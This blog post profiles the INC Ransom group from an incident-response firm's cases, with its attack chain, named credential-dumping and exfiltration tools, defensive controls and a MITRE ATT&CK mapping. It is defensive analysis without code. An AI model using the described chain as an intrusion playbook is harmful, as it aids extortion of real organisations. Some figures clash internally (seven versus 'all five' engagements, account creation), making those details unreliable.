Reputational Hostage: How INC Ransom Weaponises Your Own Data Against You

Last update: 30 June, 2026

Tags: Blog

Nick Thanos

Prepared by: Nick Thanos | Published: 30 June 2026

Threat actor profile: INC Ransom

Threat actor status: ACTIVE

Since July 2023, a ransomware group called INC Ransom has been targeting organisations across healthcare, government, energy and critical infrastructure by stealing sensitive data and threatening to publish it unless a ransom is paid. Active globally and observed directly by Triskele Labs across seven incident response engagements in Australia, the group operates under a ransomware-as-a-service (RaaS) model and distinguishes itself through deliberate social engineering, framing extortion as a reputational protection service. Victims are told that paying is not capitulating to criminals; it is a business decision that protects their reputation. That framing, combined with a methodical approach to exploiting weak remote access infrastructure, makes INC Ransom one of the more consistent ransomware threats active today.

INC Ransom: Background

INC Ransom first appeared in July 2023 and has since established itself as a persistent presence in the global ransomware ecosystem. The group operates under a ransomware-as-a-service model, where a core operator provides infrastructure and tooling to a network of affiliates who carry out intrusions in exchange for a share of ransom proceeds. This structure allows the group to run multiple simultaneous campaigns without the core operators conducting every intrusion themselves.

The group's double extortion model works in two stages. Before deploying encryption, affiliates first exfiltrate sensitive data from the victim environment. Victims are then presented with two demands, pay to prevent release of that data on INC Ransom's dark web leak site, a website hosted on the Tor network, where ransomware groups publish stolen data from victims who decline to pay, and pay for a decryptor to restore access to encrypted systems.

The framing is deliberately clinical. INC Ransom positions the ransom payment as a service exchange that protects the victim's reputation, designed to lower psychological resistance to payment and to make non-compliance feel like a deliberate business decision with predictable consequences. The leak site functions as both an extortion mechanism and a public record of non-compliant victims, creating downstream consequences including regulatory scrutiny, client notification obligations and reputational damage.

The group targets organisations across aerospace, defence, automotive, energy and utilities, healthcare, government, pharmaceuticals, technology, telecommunications, and transport and logistics. Triskele Labs' seven direct engagements are consistent with opportunistic targeting rather than a deliberate regional strategy, though sectors where data confidentiality and service availability are operationally critical are a clear preference.

How INC Ransom Operates

Across the seven incidents responded to by Triskele Labs, a consistent and methodical pattern of compromise emerged.

Initial Access: VPN and Internet-Facing Software Exploitation

The most common entry point is the exploitation of VPN credentials or vulnerabilities in software exposed to the internet. A Virtual Private Network, or VPN, is a service that allows authorised users to connect securely to an organisation's internal network from outside the office. When VPN services lack Multi-Factor Authentication (MFA), a security control requiring users to verify identity through at least two methods such as a password and a one-time code, or when the underlying software carries an unpatched vulnerability, they become a reliable entry point.

This is consistent with the broader Australian landscape. Exposed SSL VPN services without MFA were the single largest initial access vector across all Triskele Labs ransomware engagements in FY25, accounting for 23 incidents, up 64% from the previous year. In some engagements, the entry point was a different internet-facing application rather than the VPN itself; the result is the same, a foothold inside the network perimeter without triggering any perimeter alert.

Initial Access: Trusted Third-Party and MSP Access

A distinct and harder-to-detect vector observed in INC Ransom engagements is the exploitation of trusted third-party relationships, specifically the privileged access that managed service providers (MSPs) hold into client environments. An MSP is an external IT provider that manages systems or security services on behalf of a client. To do that work, the MSP is typically granted elevated, often domain-level access that is persistent rather than time-limited.

Where a threat actor compromises an MSP's credentials or systems, they inherit that access across the MSP's client base. From the client environment's perspective, the connection appears entirely legitimate, as it arrives from a known source, uses valid credentials, and travels over an established access path. There are no perimeter alerts, no failed authentication attempts, and no anomalous tooling at the point of entry.

This vector is particularly difficult to detect because the usual indicators of initial compromise are absent. Triskele Labs observed third-party compromise as a recurring theme across FY25; in a number of cases, MSP accounts carried full administrator privileges with no MFA enforced, and access was permitted from unmanaged devices with no source location restrictions. For organisations that rely on MSPs, the security posture of that third party is directly part of their own risk profile.

Lateral Movement via Remote Desktop Protocol

Once inside the environment, INC Ransom affiliates consistently use Remote Desktop Protocol (RDP) to move laterally between systems. RDP is a Microsoft technology that allows a user to connect to and control a remote computer as though they were sitting in front of it; it is standard within most Windows environments and routinely used by IT administrators. Using valid domain credentials, a threat actor can traverse the internal network, identify high-value targets such as domain controllers and file servers, and conduct reconnaissance without deploying specialised tooling. RDP was the consistent lateral movement mechanism across all five Triskele Labs engagements.

Privilege Escalation and Credential Access

Escalating to domain administrator level is a critical step in the attack chain. Domain administrator credentials provide unrestricted access across the environment, including the ability to modify Group Policy, disable security tooling, and reach every system on the network.

INC Ransom affiliates pursue this through OS credential dumping targeting the Active Directory database (NTDS), the centralised store of all user accounts and passwords within a Windows organisation, and Local Security Authority (LSA) secrets, sensitive credential material stored by Windows to support automatic service functions. Mimikatz, a post-exploitation tool that extracts passwords and authentication tokens directly from Windows memory, and DonPAPI, a tool that leverages the Windows Data Protection API, a system Windows uses to encrypt sensitive data on behalf of applications, to extract credentials and browser cookies, were both observed in use. Where existing domain credentials are available, the group abuses them rather than creating new accounts, reducing forensic footprint.

Defence Evasion

INC Ransom operators take deliberate steps to reduce visibility and remove evidence. Observed techniques include clearing Windows Event Logs, the primary record of system and security activity on a Windows machine; deleting artefacts left behind during the intrusion, masquerading malicious scheduled tasks or services with legitimate-sounding names and disabling or modifying security tools including EDR software and antivirus.

Group Policy modification was also observed. Group Policy is a Windows feature allowing administrators to define and enforce settings across all systems in an organisation from a central location. Modifying Group Policy Objects (GPOs) allows the threat actor to subvert access controls and push configuration changes across the entire domain simultaneously, changes that are difficult to reverse quickly under incident response pressure. By the time encryption is deployed, a significant portion of the forensic record may already have been destroyed.

Data Collection and Exfiltration

Before encryption, INC Ransom affiliates collect and stage data from network shared drives, the shared folders and file servers organisations use to store and distribute information internally. Data is consolidated locally before being transferred out.

Rclone, a command-line program designed to synchronise files between a local system and cloud storage services, repurposed here to quietly transfer stolen data to attacker-controlled cloud infrastructure, is among the tools observed. Mega, a cloud storage and file-sharing platform offering encrypted storage and transfer, has been used as a destination for exfiltrated data. Restic, an open-source backup tool designed for encrypted deduplicated backups, has also been observed repurposed for exfiltration. Data is transferred over alternative protocols or directly to cloud storage rather than over the primary command-and-control channel, reducing the likelihood of detection.

Encryption and Impact

Encryption is the final stage and typically the first event that triggers visible disruption. By this point, exfiltration is complete and leverage is established. Scheduled tasks, a Windows feature that runs programs automatically at defined times or intervals, are used to deploy the ransomware payload broadly and in sequence. Windows services are also abused to ensure persistent execution during deployment. The ransom note frames payment as a business transaction protecting the victim's reputation and the decryptor is positioned as a secondary benefit.

INC Ransom: Reducing your exposure

The consistent entry points and techniques observed across INC Ransom engagements mean there are clear, actionable controls that reduce risk materially.

Enforce MFA across all external-facing services without exception.
INC Ransom's most common entry point is an exposed VPN or internet-facing service without MFA. Without it, a stolen username and password is sufficient for full access. This single control, consistently applied to VPN gateways, Remote Desktop Gateway (RDG) servers, and any other externally accessible service, would prevent the majority of observed INC Ransom intrusions. Note that RDG servers do not natively support MFA, additional configuration is required, and organisations should seek specialist advice if uncertain whether their RDG is adequately protected.
Patch internet-facing systems promptly and maintain a current asset inventory.
INC Ransom affiliates exploit unpatched vulnerabilities in internet-facing applications as a primary entry method. A documented patch management programme with defined timelines for critical patches, typically 24 to 72 hours for actively exploited vulnerabilities on externally accessible systems, reduces the window of exposure. Where immediate patching is not possible, implement compensating controls such as taking the affected service offline or tightening network access until the vulnerability is remediated.
Govern third-party and MSP access with the same rigour applied to internal administrators.
INC Ransom has been observed gaining initial access through MSP connections, a vector that bypasses perimeter controls entirely. Maintain a centralised register of all third-party accounts; enforce MFA for all external access without exception, including MSP accounts; restrict access to known IP ranges or managed devices where possible; implement time-limited rather than persistent standing permissions; and log and monitor all third-party activity. External parties should not be treated as trusted insiders without equivalent controls applied.
Restrict and monitor RDP within the internal network.
INC Ransom uses RDP as its primary lateral movement mechanism. Limit RDP access to only the systems and accounts that require it for legitimate purposes, enforce strong authentication for all RDP sessions, and monitor for activity outside normal patterns, particularly sessions initiated from unexpected source systems, at unusual hours, or targeting domain controllers and backup infrastructure. Network segmentation that prevents workstations from initiating RDP connections directly to servers significantly reduces available lateral movement paths.
Deploy and maintain EDR across every endpoint and server.
Standard antivirus does not detect the credential access, lateral movement and defence evasion techniques INC Ransom uses once inside a network. Endpoint Detection and Response (EDR) solutions, which monitor device behaviour continuously and alert on suspicious activity, provide the required visibility. EDR must be deployed consistently, as threat actors routinely identify hosts without security tooling and use them as staging grounds. Tamper protection should be enabled so that tooling cannot be disabled by an unauthorised process.
Protect Active Directory and monitor for credential dumping.
INC Ransom targets Active Directory credential stores directly using Mimikatz and DonPAPI. Monitor for processes and behaviours associated with credential dumping, implement Protected Users security groups and Credential Guard where appropriate and ensure domain administrator accounts are used only for domain administration tasks and are not exposed on workstations where credential material could be harvested.
Monitor for exfiltration tooling and anomalous outbound data volumes.
INC Ransom uses Rclone, Mega and Restic for exfiltration. Because these tools are not inherently malicious, detection requires behavioural context. Build detections that flag unexpected use of cloud sync and backup tooling in combination with large data staging activity or unusual outbound volumes and set alerts on outbound data volumes exceeding normal baselines, particularly outside business hours.
Ensure security alerting is monitored around the clock.
INC Ransom conducts its most disruptive activity outside business hours. Alerts generated overnight or over weekends and reviewed the following morning represent a window in which a threat actor can move from initial access to full encryption undetected. Whether through an internal security operations capability or an external managed detection and response (MDR) provider, continuous monitoring is essential.

Summary

INC Ransom is an active, financially motivated ransomware group operating under a ransomware-as-a-service model since July 2023. Its defining characteristic is the deliberate framing of extortion as a reputational protection service: pay, and the group prevents publication of your data; don't pay, and your organisation's name and data appear on their leak site. That framing, combined with a methodical approach to exploiting weak remote access infrastructure, makes it one of the more consistent ransomware threats in the Australian market.

Triskele Labs has responded directly to seven INC Ransom incidents. The pattern is consistent: gain initial access through an exposed VPN, a vulnerable internet-facing application, or a trusted MSP connection; move laterally via RDP using valid domain credentials; escalate to domain administrator level through credential dumping; disable security tooling and clear logs; stage and exfiltrate data using Rclone, Mega, or Restic; then deploy ransomware via scheduled tasks at scale.

The MSP access vector deserves particular attention. Where a trusted third party holds persistent, privileged access to a client environment, the security controls applied to that third party's own systems and credentials directly determine the client's exposure. Internal controls alone cannot fully address this risk.

The defences most likely to disrupt an INC Ransom intrusion are foundational: enforce MFA on all external-facing services, patch promptly, govern third-party access rigorously, deploy EDR consistently, and ensure alerting is monitored at all hours. INC Ransom is not a technically exceptional group. It succeeds because the environments it targets have not applied the controls that would stop it at the door.

If your organisation has experienced an INC Ransom incident or suspects a compromise involving ransomware or data exfiltration, engage your cyber insurer and a reputable DFIR firm promptly. Early investigation is critical to understanding the scope of data accessed, meeting regulatory notification obligations, and preventing further exposure.

MITRE ATT&CK Mapping

TACTIC	TECHNIQUE	DESCRIPTION
Initial Access	T1078.002 - Valid Accounts: Domain Accounts	Obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defence Evasion.
Initial Access	T1133 - External Remote Services	Leverage external-facing remote services to initially access and/or persist within a network.
Initial Access	T1190 - Exploit Public-Facing Application	Attempt to exploit a weakness in an internet-facing host or system to initially access a network.
Initial Access	T1199 - Trusted Relationship	The Threat Actor used the managed service provider's (MSP's) access to the client's environment for initial access.
Persistence	T1053.005 - Scheduled Task/Job: Scheduled Task	A scheduled task was created to execute a malicious program or code.
Persistence	T1136.001 - Create Account: Local Account	Create a local account to maintain access to victim systems.
Persistence	T1543.003 - Create or Modify System Process: Windows Service	Create or modify Windows services to repeatedly execute malicious payloads as part of persistence.
Execution	T1053.005 - Scheduled Task/Job: Scheduled Task	Abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code.
Execution	T1059.001 - Command and Scripting Interpreter: PowerShell	Abuse PowerShell commands and scripts for execution.
Execution	T1059.003 - Command and Scripting Interpreter: Windows Command Shell	Abuse the Windows command shell for execution.
Execution	T1203 - Exploitation for Client Execution	Exploit software vulnerabilities in client applications to execute code.
Execution	T1204.002 - User Execution: Malicious File	Rely upon a user opening a malicious file to gain execution.
Defence Evasion	T1070.001 - Indicator Removal: Clear Windows Event Logs	Clear Windows Event Logs to hide the activity of an intrusion.
Defence Evasion	T1070.004 - Indicator Removal: File Deletion	Delete files left behind by the actions of their intrusion activity.
Defence Evasion	T1036.004 - Masquerading: Masquerade Task or Service	Attempt to manipulate the name of a task or service to make it appear legitimate or benign.
Defence Evasion	T1484.001 - Domain or Tenant Policy Modification: Group Policy Modification	Modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain.
Defence Evasion	T1562.001 - Impair Defences: Disable or Modify Tools	Modify and/or disable security tools to avoid possible detection of their malware and activities.
Credential Access	T1003.003 - OS Credential Dumping: NTDS	Attempt to access or create a copy of the Active Directory domain database to steal credential information.
Credential Access	T1003.004 - OS Credential Dumping: LSA Secrets	The Local Security Authority (LSA) secrets containing credentials were collected by the Threat Actor.
Credential Access	T1078.002 - Valid Accounts: Domain Accounts	Obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defence Evasion.
Credential Access	T1212 - Exploitation for Credential Access	Exploit software vulnerabilities in an attempt to collect credentials.
Discovery	T1046 - Network Service Discovery	Attempt to get a listing of services running on remote hosts and local network infrastructure devices.
Discovery	T1087.002 - Account Discovery: Domain Account	Domain account information was collected.
Discovery	T1135 - Network Share Discovery	Look for folders and drives shared on remote systems as a means of identifying sources of information to gather.
Lateral Movement	T1021.001 - Remote Services: Remote Desktop Protocol	Use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP).
Collection	T1039 - Data from Network Shared Drive	Data was collected from shared network drives.
Collection	T1074.001 - Data Staged: Local Data Staging	Stage collected data in a central location or directory on the local system prior to exfiltration.
Collection	T1560.001 - Archive Collected Data: Archive via Utility	Use utilities to compress and/or encrypt collected data prior to exfiltration.
Command and Control	T1219 - Remote Access Software	Use legitimate remote access tools to establish an interactive command and control channel within a network.
Exfiltration	T1048 - Exfiltration Over Alternative Protocol	Steal data by exfiltrating it over a different protocol than that of the existing command and control channel.
Exfiltration	T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage	Exfiltrate data to a cloud storage service rather than over their primary command and control channel.
Impact	T1486 - Data Encrypted for Impact	Encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

Common Utilised Tooling

TOOL	PURPOSE
Mimikatz	Credential dumping tool used to extract passwords and authentication tokens from Windows memory.
PsExec	Remote administration tool used to execute commands on other systems across the network.
Rclone	Command-line cloud storage sync tool repurposed for large-scale data exfiltration to attacker-controlled infrastructure.
Mega	Cloud storage platform used as a destination for exfiltrated data.
Restic	Open-source backup tool repurposed for encrypted exfiltration of stolen data.
AnyDesk	Legitimate remote desktop application repurposed for persistent access and command and control.
DonPAPI	Post-exploitation tool used to extract credentials and sensitive data via the Windows Data Protection API.
ScreenConnect	Remote support and access software repurposed for persistent access and lateral movement.